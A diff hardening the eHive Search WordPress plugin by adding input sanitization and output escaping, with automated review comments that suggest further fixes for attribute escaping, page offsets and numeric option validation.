--- a/ehive-search/EHiveSearch.php
+++ b/ehive-search/EHiveSearch.php
@@ -4,7 +4,7 @@
Plugin URI: http://developers.ehive.com/wordpress-plugins/
Author: Vernon Systems limited
Description: Search and display results from eHive. The <a href="http://developers.ehive.com/wordpress-plugins#ehiveaccess" target="_blank">eHiveAccess plugin</a> must be installed.
- Version: 2.5.0
+ Version: 2.5.1
Author URI: http://vernonsystems.com
License: GPL2+
*/
@@ -34,8 +34,8 @@
const CURRENT_VERSION = 4; // Increment each time an upgrade is required / options added or deleted.
const EHIVE_SEARCH_OPTIONS = "ehive_search_options";
- function __construct() {
-
+ function __construct() {
+ add_action("init", array(&$this, "ehive_search_init"));
add_action("admin_init", array(&$this, "ehive_search_admin_options_init"));
add_action("admin_menu", array(&$this, "ehive_search_admin_menu"));
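Review bot: The added `add_action("init", array(&$this, "ehive_search_init"));` keeps the `array(&$this, ...)` callback form; objects have been passed by handle since PHP 5, so the `&` buys nothing and `array($this, "ehive_search_init")` is the conventional spelling. The surrounding context lines share the habit, but only the new line is in scope for this hunk. The constructor continues past the end of the hunk.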
@@ -43,6 +43,22 @@
add_shortcode('ehive_search', array(&$this, 'ehive_search_shortcode'));
}
+ function ehive_search_init() {
+ add_action('pre_get_posts', array(&$this, 'alter_post_query_var'));
+ }
+
+ function alter_post_query_var($query) {
+ if (!is_admin() && $query->is_main_query()) {
+ $options = get_option('ehive_search_options');
+ if (isset($options['query_var'])) {
+ $query->set($options['query_var'], sanitize_text_field( $query->get($options['query_var'])));
+ }
+ if (isset($options['page_var'])) {
+ $query->set($options['page_var'], sanitize_text_field( $query->get($options['page_var'])));
+ }
+ }
+ }
+
function ehive_search_admin_options_init(){
$this->ehive_plugin_update();
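Review bot: `alter_post_query_var()` calls `$query->set()` unconditionally, so when a request carries neither variable the main query ends up with both vars set to an empty string instead of leaving them absent; read the raw value first and only set it when present: `$raw = $query->get($options['query_var']); if ($raw !== '') { $query->set($options['query_var'], sanitize_text_field($raw)); }`. The page variable is consumed as an integer further down (the shortcode runs it through `intVal()`), so `absint()` is a closer fit than `sanitize_text_field()` for `page_var`. `get_option()` returns `false` until the settings are first saved; `isset($options['query_var'])` tolerates that, but a comment such as `// get_option() may return false before first save; isset() copes with that` would spare the next reader the check. `ehive_search_admin_options_init()` continues past the end of the hunk.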
@@ -79,6 +95,84 @@
}
function ehive_search_options_validate($input) {
+
+ if(isset($input['limit'])) { $input['limit'] = sanitize_text_field($input['limit']); }
+ if(!isset($input['limit']) || $input['limit'] == "" ) {
+ $input['limit'] = "12";
+ }
+
+ // Lightbox view
+ if(isset($input['lightbox_object_number_enabled_label'])) { $input['lightbox_object_number_enabled_label'] = sanitize_text_field($input['lightbox_object_number_enabled_label']); }
+ if(isset($input['lightbox_name_enabled_label'])) { $input['lightbox_name_enabled_label'] = sanitize_text_field($input['lightbox_name_enabled_label']); }
+ if(isset($input['lightbox_primary_creator_maker_enabled_label'])) { $input['lightbox_primary_creator_maker_enabled_label'] = sanitize_text_field($input['lightbox_primary_creator_maker_enabled_label']); }
+ if(isset($input['lightbox_primary_creator_maker_role_enabled_label'])) { $input['lightbox_primary_creator_maker_role_enabled_label'] = sanitize_text_field($input['lightbox_primary_creator_maker_role_enabled_label']); }
+ if(isset($input['lightbox_taxonomic_classification_enabled'])) { $input['lightbox_taxonomic_classification_enabled'] = sanitize_text_field($input['lightbox_taxonomic_classification_enabled']); }
+ if(isset($input['lightbox_taxonomic_type_indicator_enabled'])) { $input['lightbox_taxonomic_type_indicator_enabled'] = sanitize_text_field($input['lightbox_taxonomic_type_indicator_enabled']); }
+ if(isset($input['lightbox_field_collector_enabled'])) { $input['lightbox_field_collector_enabled'] = sanitize_text_field($input['lightbox_field_collector_enabled']); }
+ if(isset($input['lightbox_web_public_description_enabled'])) { $input['lightbox_web_public_description_enabled'] = sanitize_text_field($input['lightbox_web_public_description_enabled']); }
+ if(isset($input['lightbox_date_made_enabled'])) { $input['lightbox_date_made_enabled'] = sanitize_text_field($input['lightbox_date_made_enabled']); }
+ if(isset($input['lightbox_place_made_enabled'])) { $input['lightbox_place_made_enabled'] = sanitize_text_field($input['lightbox_place_made_enabled']); }
+ if(isset($input['lightbox_object_type_enabled'])) { $input['lightbox_object_type_enabled'] = sanitize_text_field($input['lightbox_object_type_enabled']); }
+ if(isset($input['lightbox_medium_description_enabled'])) { $input['lightbox_medium_description_enabled'] = sanitize_text_field($input['lightbox_medium_description_enabled']); }
+ if(isset($input['lightbox_measurement_description_enabled'])) { $input['lightbox_measurement_description_enabled'] = sanitize_text_field($input['lightbox_measurement_description_enabled']); }
+ if(isset($input['lightbox_named_collection_enabled'])) { $input['lightbox_named_collection_enabled'] = sanitize_text_field($input['lightbox_named_collection_enabled']); }
+ if(isset($input['lightbox_credit_line_enabled'])) { $input['lightbox_credit_line_enabled'] = sanitize_text_field($input['lightbox_credit_line_enabled']); }
+
+ if(isset($input['lightbox_columns'])) { $input['lightbox_columns'] = sanitize_text_field($input['lightbox_columns']); }
+ if(!isset($input['lightbox_columns']) || $input['lightbox_columns'] == "" ) {
+ $input['lightbox_columns'] = "1";
+ }
+
+ if(isset($input['lightbox_more_link_text'])) { $input['lightbox_more_link_text'] = sanitize_text_field($input['lightbox_more_link_text']); }
+
+ if(isset($input['query_var'])) { $input['query_var'] = sanitize_text_field($input['query_var']); }
+ if(!isset($input['query_var']) || $input['query_var'] == "" ) {
+ $input['query_var'] = "eHive_query";
+ }
+
+ if(isset($input['page_var'])) { $input['page_var'] = sanitize_text_field($input['page_var']); }
+ if(!isset($input['page_var']) || $input['page_var'] == "" ) {
+ $input['page_var'] = "eHive_page";
+ }
+
+ if(isset($input['css_class'])) { $input['css_class'] = sanitize_text_field($input['css_class']); }
+
+ if(isset($input['item_background_colour'])) { $input['item_background_colour'] = sanitize_text_field($input['item_background_colour']); }
+ if(!isset($input['item_background_colour']) || $input['item_background_colour'] == "" ) {
+ $input['item_background_colour'] = "#f3f3f3";
+ }
+
+ if(isset($input['item_border_colour'])) { $input['item_border_colour'] = sanitize_text_field($input['item_border_colour']); }
+ if(!isset($input['item_border_colour']) || $input['item_border_colour'] == "" ) {
+ $input['item_border_colour'] = "#666666";
+ }
+
+ if(isset($input['item_border_width'])) { $input['item_border_width'] = sanitize_text_field($input['item_border_width']); }
+ if(!isset($input['item_border_width']) || $input['item_border_width'] == "" ) {
+ $input['item_border_width'] = "2";
+ }
+
+ if(isset($input['image_background_colour'])) { $input['image_background_colour'] = sanitize_text_field($input['image_background_colour']); }
+ if(!isset($input['image_background_colour']) || $input['image_background_colour'] == "" ) {
+ $input['image_background_colour'] = "#ffffff";
+ }
+
+ if(isset($input['image_padding'])) { $input['image_padding'] = sanitize_text_field($input['image_padding']); }
+ if(!isset($input['image_padding']) || $input['image_padding'] == "" ) {
+ $input['image_padding'] = "1";
+ }
+
+ if(isset($input['image_border_colour'])) { $input['image_border_colour'] = sanitize_text_field($input['image_border_colour']); }
+ if(!isset($input['image_border_colour']) || $input['image_border_colour'] == "" ) {
+ $input['image_border_colour'] = "#666666";
+ }
+
+ if(isset($input['image_border_width'])) { $input['image_border_width'] = sanitize_text_field($input['image_border_width']); }
+ if(!isset($input['image_border_width']) || $input['image_border_width'] == "" ) {
+ $input['image_border_width'] = "2";
+ }
+
+
add_settings_error('ehive_search_options', 'updated', 'eHive Search settings saved.', 'updated');
$input["update_version"] = self::CURRENT_VERSION; // Retain the plugin version on save of opotions.
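Review bot: `limit`, `lightbox_columns`, `item_border_width`, `image_padding` and `image_border_width` are sanitized as free text, yet `limit` is used as a divisor in the template (`ceil($objectRecordsCollection->totalObjects / $options['limit'])`) and as a multiplier for `$offset`; a submitted `"0"` or `"abc"` passes the `== ""` check and reaches that division. Coerce the numeric options with `absint()` and fall back to the default when the result is not usable, keeping `0` only where it is meaningful (the template treats `image_padding > 0` as a deliberate choice). `query_var` and `page_var` become query-string keys and HTML `name` attributes, so limiting them to `[A-Za-z0-9_-]` belongs in this callback. The run of one-line `if(isset(...))` blocks reads more clearly as loops over key lists, as in the fence; `ehive_search_options_validate()` continues past the end of the hunk.
```php
function ehive_search_options_validate($input) {
    // Free-text options: strip tags, line breaks and stray whitespace.
    $textKeys = [
        'lightbox_object_number_enabled_label',
        'lightbox_name_enabled_label',
        // … remaining lightbox_*_enabled(_label) keys from the original list …
        'lightbox_more_link_text',
        'css_class',
    ];
    foreach ($textKeys as $key) {
        if (isset($input[$key])) {
            $input[$key] = sanitize_text_field($input[$key]);
        }
    }

    // Colours: text-sanitized, with the original fallbacks when left blank.
    $colourDefaults = [
        'item_background_colour' => '#f3f3f3',
        'item_border_colour' => '#666666',
        'image_background_colour' => '#ffffff',
        'image_border_colour' => '#666666',
    ];
    foreach ($colourDefaults as $key => $default) {
        $value = isset($input[$key]) ? sanitize_text_field($input[$key]) : '';
        $input[$key] = ($value === '') ? $default : $value;
    }

    // Positive integers only: 'limit' is a divisor in the template's pagination, so zero must not be stored.
    $positiveIntDefaults = ['limit' => 12, 'lightbox_columns' => 1];
    foreach ($positiveIntDefaults as $key => $default) {
        $value = isset($input[$key]) ? absint($input[$key]) : 0;
        $input[$key] = (string) ($value > 0 ? $value : $default);
    }

    // Non-negative integers: a width or padding of 0 is a valid choice; an empty field gets the default.
    $intDefaults = ['item_border_width' => 2, 'image_padding' => 1, 'image_border_width' => 2];
    foreach ($intDefaults as $key => $default) {
        $blank = !isset($input[$key]) || $input[$key] === '';
        $input[$key] = $blank ? (string) $default : (string) absint($input[$key]);
    }

    // Query-string keys / HTML name attributes: allow only a safe token, default when nothing is left.
    foreach (['query_var' => 'eHive_query', 'page_var' => 'eHive_page'] as $key => $default) {
        $value = isset($input[$key]) ? preg_replace('/[^A-Za-z0-9_\-]/', '', $input[$key]) : '';
        $input[$key] = ($value === '') ? $default : $value;
    }

    // … unchanged: add_settings_error(), update_version, return …
```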
@@ -193,9 +287,6 @@
add_settings_field('image_border_width', 'Image border width', array(&$this, 'image_border_width_fn'), __FILE__, 'css_inline_section');
}
- //
- // GENERAL OPTIONS SECTION
- //
function limit_fn() {
$options = get_option('ehive_search_options');
echo "<input class='small-text' id='limit' name='ehive_search_options[limit]' type='number' value='{$options['limit']}' />";
@@ -272,9 +363,6 @@
}
}
- //
- // RESULTS VIEW SECTION
- //
function result_views_options_fn($keyValuePair) {
$options = get_option('ehive_search_options');
@@ -304,9 +392,6 @@
echo "<input ".$checked." id='show_powered_by_ehive' name='ehive_search_options[show_powered_by_ehive]' type='checkbox' />";
}
- //
- // LIST VIEW SECTION
- //
function list_view_options_fn($key) {
$options = get_option('ehive_search_options');
@@ -335,11 +420,7 @@
}
echo "</select>";
}
-
-
- //
- // LIGHTBOX VIEW SECTION
- //
+
function lightbox_columns_fn() {
$options = get_option('ehive_search_options');
echo "<input class='small-text' id='lightbox_columns' name='ehive_search_options[lightbox_columns]' type='number' value='{$options['lightbox_columns']}' />";
@@ -365,7 +446,8 @@
}
if(isset($options[$key.'_label'])){
- echo "<input id='{$key}_label' name='ehive_search_options[{$key}_label]' size='40' type='text' value='{$options[$key.'_label']}' />";
+ $labelValue = sanitize_text_field($options[$key.'_label']);
+ echo "<input id='{$key}_label' name='ehive_search_options[{$key}_label]' size='40' type='text' value='{$labelValue}' />";
} else {
echo "<input id='{$key}_label' name='ehive_search_options[{$key}_label]' size='40' type='text' value='' />";
}
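Review bot: `sanitize_text_field()` on the new `$labelValue` line is an input filter, not an output escaper: it leaves `'` intact, so a stored label containing a single quote still terminates the `value='…'` attribute on the following line. Use the attribute escaper, as this same commit does in the template: `$labelValue = esc_attr($options[$key.'_label']);`. The neighbouring `limit_fn()`, `lightbox_columns_fn()`, `query_var_fn()` and `css_class_fn()` echo `{$options[...]}` straight into attributes without escaping; they are context here rather than new code, but warrant the same treatment. The enclosing function starts before the hunk.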
@@ -390,11 +472,7 @@
}
echo "</select>";
}
-
-
- //
- // ADVANCED OPTIONS SECTION
- //
+
function query_var_fn() {
$options = get_option('ehive_search_options');
echo "<input class='medium-text' id='query_var' name='ehive_search_options[query_var]' type='text' value='{$options['query_var']}' />";
@@ -405,9 +483,6 @@
echo "<input class='medium-text' id='page_var' name='ehive_search_options[page_var]' type='text' value='{$options['page_var']}' />";
}
- //
- // CSS OPTIONS SECTION
- //
function css_class_fn() {
$options = get_option('ehive_search_options');
echo "<input class='medium-text' id='css_class' name='ehive_search_options[css_class]' type='text' value='{$options['css_class']}' />";
@@ -423,9 +498,6 @@
echo "<input {$checked} id='plugin_css_enabled' name='ehive_search_options[plugin_css_enabled]' type='checkbox' />";
}
- //
- // INLINE CSS OPTIONS SECTION
- //
function item_background_colour_fn() {
$options = get_option('ehive_search_options');
$checked = '';
@@ -640,31 +712,47 @@
return get_option('ehive_search_options');
}
- public function ehive_search_shortcode($atts) {
- global $eHiveAccess;
+ public function ehive_search_shortcode($atts=[]) {
- $options = get_option('ehive_search_options');
+ $options = get_option('ehive_search_options');
+
+ $attsMerged = shortcode_atts(['css_class' => array_key_exists('css_class', $options) ? sanitize_text_field($options['css_class']) : '',
+ 'item_background_colour' => array_key_exists('item_background_colour', $options) ? sanitize_text_field($options['item_background_colour']) : '#f3f3f3',
+ 'item_background_colour_enabled' => array_key_exists('item_background_colour_enabled', $options) ? sanitize_text_field($options['item_background_colour_enabled']) : 'on',
+ 'item_border_colour' => array_key_exists('item_border_colour', $options) ? sanitize_text_field($options['item_border_colour']) : '#666666',
+ 'item_border_colour_enabled' => array_key_exists('item_border_colour_enabled', $options) ? sanitize_text_field($options['item_border_colour_enabled']) : '',
+ 'item_border_width' => array_key_exists('item_border_width', $options) ? sanitize_text_field($options['item_border_width']) : '2',
+ 'image_background_colour' => array_key_exists('image_background_colour', $options) ? sanitize_text_field($options['image_background_colour']) : '#ffffff',
+ 'image_background_colour_enabled' => array_key_exists('image_background_colour_enabled', $options) ? sanitize_text_field($options['image_background_colour_enabled']) : 'on',
+ 'image_padding' => array_key_exists('image_padding', $options) ? sanitize_text_field($options['image_padding']) : '1',
+ 'image_padding_enabled' => array_key_exists('image_padding_enabled', $options) ? sanitize_text_field($options['image_padding_enabled']) : 'on',
+ 'image_border_colour' => array_key_exists('image_border_colour', $options) ? sanitize_text_field($options['image_border_colour']) : '#666666',
+ 'image_border_colour_enabled' => array_key_exists('image_border_colour_enabled', $options) ? sanitize_text_field($options['image_border_colour_enabled']) : 'on',
+ 'image_border_width' => array_key_exists('image_border_width', $options) ? sanitize_text_field($options['image_border_width']) : '2',
+ 'sort_name' => array_key_exists('sort_name', $options) ? sanitize_text_field($options['sort_name']) : 'search_relevance',
+ 'sort_order' => array_key_exists('sort_order', $options) ? sanitize_text_field($options['sort_order']) : 'asc',
+ 'image_size_list' => array_key_exists('image_size_list', $options) ? sanitize_text_field($options['image_size_list']) : 'TS',
+ 'image_size_lightbox' => array_key_exists('image_size_lightbox', $options) ? sanitize_text_field($options['image_size_lightbox']) : 'S'
+ ],$atts, "ehive_search");
+
+ $css_class = sanitize_text_field($attsMerged['css_class']);
+ $item_background_colour = sanitize_text_field($attsMerged['item_background_colour']);
+ $item_background_colour_enabled = sanitize_text_field($attsMerged['item_background_colour_enabled']);
+ $item_border_colour = sanitize_text_field($attsMerged['item_border_colour']);
+ $item_border_colour_enabled = sanitize_text_field($attsMerged['item_border_colour_enabled']);
+ $item_border_width = sanitize_text_field($attsMerged['item_border_width']);
+ $image_background_colour = sanitize_text_field($attsMerged['image_background_colour']);
+ $image_background_colour_enabled = sanitize_text_field($attsMerged['image_background_colour_enabled']);
+ $image_padding = sanitize_text_field($attsMerged['image_padding']);
+ $image_padding_enabled = sanitize_text_field($attsMerged['image_padding_enabled']);
+ $image_border_colour = sanitize_text_field($attsMerged['image_border_colour']);
+ $image_border_colour_enabled = sanitize_text_field($attsMerged['image_border_colour_enabled']);
+ $image_border_width = sanitize_text_field($attsMerged['image_border_width']);
+ $sort_name = sanitize_text_field($attsMerged['sort_name']);
+ $sort_order = sanitize_text_field($attsMerged['sort_order']);
+ $image_size_list = sanitize_text_field($attsMerged['image_size_list']);
+ $image_size_lightbox = sanitize_text_field($attsMerged['image_size_lightbox']);
- extract(shortcode_atts(array('css_class' => array_key_exists('css_class', $options) ? $options['css_class'] : '',
- 'item_background_colour' => array_key_exists('item_background_colour', $options) ? $options['item_background_colour'] : '#f3f3f3',
- 'item_background_colour_enabled' => array_key_exists('item_background_colour_enabled', $options) ? $options['item_background_colour_enabled'] : 'on',
- 'item_border_colour' => array_key_exists('item_border_colour', $options) ? $options['item_border_colour'] : '#666666',
- 'item_border_colour_enabled' => array_key_exists('item_border_colour_enabled', $options) ? $options['item_border_colour_enabled'] : '',
- 'item_border_width' => array_key_exists('item_border_width', $options) ? $options['item_border_width'] : '2',
- 'image_background_colour' => array_key_exists('image_background_colour', $options) ? $options['image_background_colour'] : '#ffffff',
- 'image_background_colour_enabled' => array_key_exists('image_background_colour_enabled', $options) ? $options['image_background_colour_enabled'] : 'on',
- 'image_padding' => array_key_exists('image_padding', $options) ? $options['image_padding'] : '1',
- 'image_padding_enabled' => array_key_exists('image_padding_enabled', $options) ? $options['image_padding_enabled'] : 'on',
- 'image_border_colour' => array_key_exists('image_border_colour', $options) ? $options['image_border_colour'] : '#666666',
- 'image_border_colour_enabled' => array_key_exists('image_border_colour_enabled', $options) ? $options['image_border_colour_enabled'] : 'on',
- 'image_border_width' => array_key_exists('image_border_width', $options) ? $options['image_border_width'] : '2',
-
- 'sort_name' => array_key_exists('sort_name', $options) ? $options['sort_name'] : 'search_relevance',
- 'sort_order' => array_key_exists('sort_order', $options) ? $options['sort_order'] : 'asc',
- 'image_size_list' => array_key_exists('image_size_list', $options) ? $options['image_size_list'] : 'TS',
- 'image_size_lightbox' => array_key_exists('image_size_lightbox', $options) ? $options['image_size_lightbox'] : 'S'
- ),$atts));
-
$resultsViewLightboxEnabled = (isset( $options['results_view_lightbox_enabled']) && $options['results_view_lightbox_enabled'] == 'on') ? true : false;
$resultsViewListEnabled = (isset ($options['results_view_list_enabled']) && $options['results_view_list_enabled'] == 'on') ? true : false;
$resultsViewPosterboardEnabled = (isset($options['results_view_posterboard_enabled']) && $options['results_view_posterboard_enabled'] == 'on') ? true : false;
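Review bot: Every default in the `shortcode_atts()` array is run through `sanitize_text_field()`, and then every merged value is run through it again in the `$css_class = …` block, so the first pass is redundant — the second one is what matters, because it also covers attributes supplied in post content. `get_option()` returns `false` until the settings are first saved, and `array_key_exists('css_class', false)` is a `TypeError` on PHP 8, so normalise first: `if (!is_array($options)) { $options = []; }`. `sort_name`, `sort_order`, `image_size_list` and `image_size_lightbox` presumably steer API behaviour downstream; an allow-list of known values would be tighter than text sanitisation, worth checking against where they are consumed. The fence shows the single-pass shape; `ehive_search_shortcode()` continues past the end of the hunk.
```php
public function ehive_search_shortcode($atts=[]) {
    $options = get_option('ehive_search_options');
    if (!is_array($options)) {
        $options = []; // get_option() returns false before the settings are first saved
    }

    // Plugin defaults, overridden by the saved option when one exists.
    $defaults = [
        'css_class' => '',
        'item_background_colour' => '#f3f3f3',
        'item_background_colour_enabled' => 'on',
        // … remaining keys and defaults from the original list …
        'image_size_lightbox' => 'S',
    ];
    foreach ($defaults as $key => $default) {
        if (array_key_exists($key, $options)) {
            $defaults[$key] = $options[$key];
        }
    }

    // Sanitize once, after merging, so saved options and shortcode attributes get identical treatment.
    $attsMerged = shortcode_atts($defaults, $atts, "ehive_search");
    foreach ($attsMerged as $key => $value) {
        $attsMerged[$key] = sanitize_text_field($value);
    }

    $css_class = $attsMerged['css_class'];
    // … one local per key as before, read from $attsMerged without a further sanitize call …
```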
@@ -674,16 +762,25 @@
$queryAll = ehive_search_get_var('all', false);
- $query = ehive_search_get_var( $options['query_var'], false);
-
+ $query = ehive_search_get_var( $options['query_var'], false);
+
$query = rawurldecode($query);
$query = stripslashes_deep( $query );
- $page = ehive_search_get_var($options['page_var'], 1) - 1;
+ if (ehive_search_get_var($options['page_var'], false)) {
+ $page = ehive_search_get_var($options['page_var']);
+ $page = intVal($page);
+ $page = $page -1;
+ } else {
+ $page = 0;
+ }
+
$offset = $page * $options['limit'];
$a = ehive_search_get_var('a' ,false);
+ global $eHiveAccess;
+
try {
if (!$query == false || $queryAll == true) {
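Review bot: The new page block calls `ehive_search_get_var()` three times and still lets `$page` go negative: a page parameter of `0` or `-5` gives `intVal()` minus one below zero, and `$offset = $page * $options['limit']` on the following line turns negative. A single clamped line covers both cases: `$page = max(0, intval(ehive_search_get_var($options['page_var'], 1)) - 1);`. `intVal` is conventionally written `intval`. `ehive_search_shortcode()` starts before and ends after this hunk.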
@@ -755,8 +852,21 @@
}
function query_vars($vars) {
- $vars[] = (isset($this->options['query_var']) && $this->options['query_var'] ) ? $this->options['query_var'] : '';
- $vars[] = (isset($this->options['page_var']) && $this->options['page_var'] ) ? $this->options['page_var'] : '';
+
+ $options = get_option(self::EHIVE_SEARCH_OPTIONS);
+
+ if (isset($options['query_var']) && $options['query_var'] !== "" ){
+ $vars[] = $options['query_var'];
+ } else {
+ $vars[] = "eHive_query";
+ }
+
+ if (isset($options['page_var']) && $options['page_var'] !== "" ){
+ $vars[] = $options['page_var'];
+ } else {
+ $vars[] = "eHive_page";
+ }
+
return $vars;
}
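Review bot: The fallbacks `"eHive_query"` and `"eHive_page"` in `query_vars()` duplicate the defaults hard-coded in `ehive_search_options_validate()`; one place should own them, e.g. `const DEFAULT_QUERY_VAR = "eHive_query";` and `const DEFAULT_PAGE_VAR = "eHive_page";` beside `EHIVE_SEARCH_OPTIONS`, referenced from both methods. Each `if/else` pair then collapses to one line: `$vars[] = (isset($options['query_var']) && $options['query_var'] !== "") ? $options['query_var'] : self::DEFAULT_QUERY_VAR;`. The registered names are whatever an administrator typed into the settings form, so any restriction on the characters of a query variable belongs in the validate callback, not here.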
@@ -925,12 +1035,13 @@
return get_permalink($pageId);
}
+
$eHiveSearch = new EHiveSearch();
add_filter('query_vars', array(&$eHiveSearch, 'query_vars'));
// add_filter('rewrite_rules_array', array(&$eHiveSearch, 'add_rewrite_rules'));
-
+
add_action('activate_ehive-search/EHiveSearch.php', array(&$eHiveSearch, 'activate'));
add_action('deactivate_ehive-search/EHiveSearch.php', array(&$eHiveSearch, 'deactivate'));
}
--- a/ehive-search/templates/eHiveSearch.php
+++ b/ehive-search/templates/eHiveSearch.php
@@ -19,31 +19,27 @@
if ($css_class == "") {
echo '<div class="ehive-search">';
} else {
- echo '<div class="ehive-search '.$css_class.'">';
+ echo '<div class="ehive-search '.esc_attr($css_class).'">';
}
if ( isset( $options['hide_search_form_enabled']) && $options['hide_search_form_enabled'] == 'on') {
} else {
-//if ( $options['hide_search_form_enabled'] != 'on') {
- echo '<form class="ehive-search" name="ehive-search-form" action="'. $eHiveAccess->getSearchPageLink() .'" method="get">';
-
- echo "<input class='ehive-query' type='text' name='". $options['query_var'] ."' value='".$query."'/>";
-
+ echo '<form class="ehive-search" name="ehive-search-form" action="'. esc_url($eHiveAccess->getSearchPageLink()) .'" method="get">';
+ echo "<input class='ehive-query' type='text' name='". esc_attr($options['query_var']) ."' value='".esc_html($query)."'/>";
echo '<input class="ehive-submit" type="submit" value="Search"/>';
echo '</form>';
}
if (isset($eHiveBadRequestErrorMessage)) {
- echo "<p class='ehive-error-message ehive-account-details-error'>$eHiveBadRequestErrorMessage</p>";
+ echo "<p class='ehive-error-message ehive-account-details-error'>".esc_html($eHiveBadRequestErrorMessage)."</p>";
} else {
if (isset($eHiveApiErrorMessage)) {
- echo "<p class='ehive-error-message ehive-account-details-error'>$eHiveApiErrorMessage</p>";
+ echo "<p class='ehive-error-message ehive-account-details-error'>".esc_html($eHiveApiErrorMessage)."</p>";
} else {
- if (isset($objectRecordsCollection)) {
-
+ if (isset($objectRecordsCollection)) {
if ($objectRecordsCollection->totalObjects > 0) {
echo '<div class="ehive-search-results">';
$view = ehive_search_get_var('view', $resultsViewDefault);
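Review bot: `esc_html($query)` on the `<input … value='…'/>` line escapes for element content, while the value sits inside a single-quoted attribute; the context-correct call is `esc_attr($query)`, which the same line already uses for the `name` attribute. Proposed: `echo "<input class='ehive-query' type='text' name='". esc_attr($options['query_var']) ."' value='".esc_attr($query)."'/>";`. The empty `if { } else { … }` around the form is context rather than new code, but inverting the condition would remove the empty branch.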
@@ -57,7 +53,13 @@
$pBase = ehive_search_link() . '?a='.$a.$all.'&view='.$view.'&%_%';
$pFormat = $options['page_var'] . '=%#%';
$pTotal = ceil($objectRecordsCollection->totalObjects / $options['limit']);
- $pCurrent = ehive_search_get_var($options['page_var'], 1);
+
+ //$pCurrent = ehive_search_get_var($options['page_var'], 1);
+ if ( ehive_search_get_var($options['page_var'])){
+ $pCurrent = ehive_search_get_var($options['page_var']);
+ } else {
+ $pCurrent = 1;
+ }
echo paginate_links( array('base' => $pBase, 'format' => $pFormat, 'total' => $pTotal, 'current' => $pCurrent) );
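Review bot: The `$pCurrent` fallback block is now repeated four times in this template (here and in the three later pagination hunks), each time calling `ehive_search_get_var()` twice and leaving the old line behind as a comment. Compute it once where `$options['page_var']` first becomes available, clamped to a valid page number: `$pCurrent = max(1, intval(ehive_search_get_var($options['page_var'], 1)));`, and drop the `//$pCurrent = …` comment lines. The one-argument `ehive_search_get_var($options['page_var'])` relies on that helper's default second parameter, which is not visible here — confirm it yields a falsy value when the variable is absent.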
@@ -67,7 +69,12 @@
$pBase = ehive_search_link() . '?' . $options['query_var'] . '=' .rawurlencode( $query ).$all.'&view='.$view.'&%_%';
$pFormat = $options['page_var'] . '=%#%';
$pTotal = ceil($objectRecordsCollection->totalObjects / $options['limit']);
- $pCurrent = ehive_search_get_var($options['page_var'], 1);
+
+ if ( ehive_search_get_var($options['page_var'])){
+ $pCurrent = ehive_search_get_var($options['page_var']);
+ } else {
+ $pCurrent = 1;
+ }
echo paginate_links( array('base' => $pBase, 'format' => $pFormat, 'total' => $pTotal, 'current' => $pCurrent) );
}
@@ -77,7 +84,6 @@
echo '</div>';
}
- //$imageSize = "";
$itemInlineStyleEnabled = false;
$imageInlineStyleEnabled = false;
$itemInlineStyle = '';
@@ -113,7 +119,7 @@
$imageInlineStyle .= "background:$image_background_colour; ";
$imageInlineStyleEnabled = true;
}
- if (isset($options['image_padding_enabled']) && $options['image_padding_enabled'] == 'on') {
+ if (isset($options['image_padding_enabled']) && $options['image_padding_enabled'] == 'on'&& $image_padding > 0) {
$imageInlineStyle .= "padding:{$image_padding}px; ";
$imageInlineStyleEnabled = true;
}
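Review bot: `$image_padding > 0` compares a text-sanitized string with an integer; under PHP 8 a non-numeric string such as `"abc"` is compared as a string against `"0"` and evaluates true, so `padding:abcpx;` is still emitted. Cast once and use the cast value in both places: `$imagePaddingPx = intval($image_padding);` then `if (isset($options['image_padding_enabled']) && $options['image_padding_enabled'] == 'on' && $imagePaddingPx > 0) {` and `$imageInlineStyle .= "padding:{$imagePaddingPx}px; ";`. The border-width values in the surrounding context lines would benefit from the same cast.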
@@ -124,10 +130,10 @@
}
if($itemInlineStyleEnabled) {
- $itemInlineStyle = " style='$itemInlineStyle'";
+ $itemInlineStyle = " style='".esc_attr($itemInlineStyle)."'";
}
if($imageInlineStyleEnabled) {
- $imageInlineStyle = " style='$imageInlineStyle'";
+ $imageInlineStyle = " style='".esc_attr($imageInlineStyle)."'";
}
echo "<div class='ehive-view ehive-$view'>";
@@ -135,7 +141,7 @@
echo "<div class='ehive-item' $itemInlineStyle>";
echo '<div class="ehive-item-image-wrap">';
- echo '<a class="ehive-image-link" href="'.$eHiveAccess->getObjectDetailsPageLink($objectRecord->objectRecordId).'">';
+ echo '<a class="ehive-image-link" href="'.esc_url($eHiveAccess->getObjectDetailsPageLink($objectRecord->objectRecordId)).'">';
$name = '';
if (isset($objectRecord->name)) {
@@ -147,7 +153,7 @@
if (isset($imageMediaSet)) {
$mediaRow = $imageMediaSet->mediaRows[0];
$imageMedia = $mediaRow->getMediaByIdentifier("image_$imageSize");
- $imageLink = '<img class="ehive-image" src="'.$imageMedia->getMediaAttribute('url').'"' . $imageInlineStyle . ' alt="'.esc_attr($imageMedia->getMediaAttribute('title')).'" title="'.esc_attr($imageMedia->getMediaAttribute('title')).'">';
+ $imageLink = '<img class="ehive-image" src="'.esc_url($imageMedia->getMediaAttribute('url')).'"' . $imageInlineStyle . ' alt="'.esc_attr($imageMedia->getMediaAttribute('title')).'" title="'.esc_attr($imageMedia->getMediaAttribute('title')).'">';
}
echo $imageLink;
@@ -174,7 +180,13 @@
$pBase = ehive_search_link() . '?a='.$a.$all.'&view='.$view.'&%_%';
$pFormat = $options['page_var'] . '=%#%';
$pTotal = ceil($objectRecordsCollection->totalObjects / $options['limit']);
- $pCurrent = ehive_search_get_var($options['page_var'], 1);
+ //$pCurrent = ehive_search_get_var($options['page_var'], 1);
+ if ( ehive_search_get_var($options['page_var'])){
+ $pCurrent = ehive_search_get_var($options['page_var']);
+ } else {
+ $pCurrent = 1;
+ }
+
echo paginate_links( array('base' => $pBase, 'format' => $pFormat, 'total' => $pTotal, 'current' => $pCurrent) );
@@ -184,8 +196,13 @@
$pBase = ehive_search_link() . '?' . $options['query_var'] . '=' .rawurlencode( $query ).$all.'&view='.$view.'&%_%';
$pFormat = $options['page_var'] . '=%#%';
$pTotal = ceil($objectRecordsCollection->totalObjects / $options['limit']);
- $pCurrent = ehive_search_get_var($options['page_var'], 1);
-
+ //$pCurrent = ehive_search_get_var($options['page_var'], 1);
+ if ( ehive_search_get_var($options['page_var'])){
+ $pCurrent = ehive_search_get_var($options['page_var']);
+ } else {
+ $pCurrent = 1;
+ }
+
echo paginate_links( array('base' => $pBase, 'format' => $pFormat, 'total' => $pTotal, 'current' => $pCurrent) );
}
@@ -232,7 +249,7 @@
if ($view == 'lightbox') {
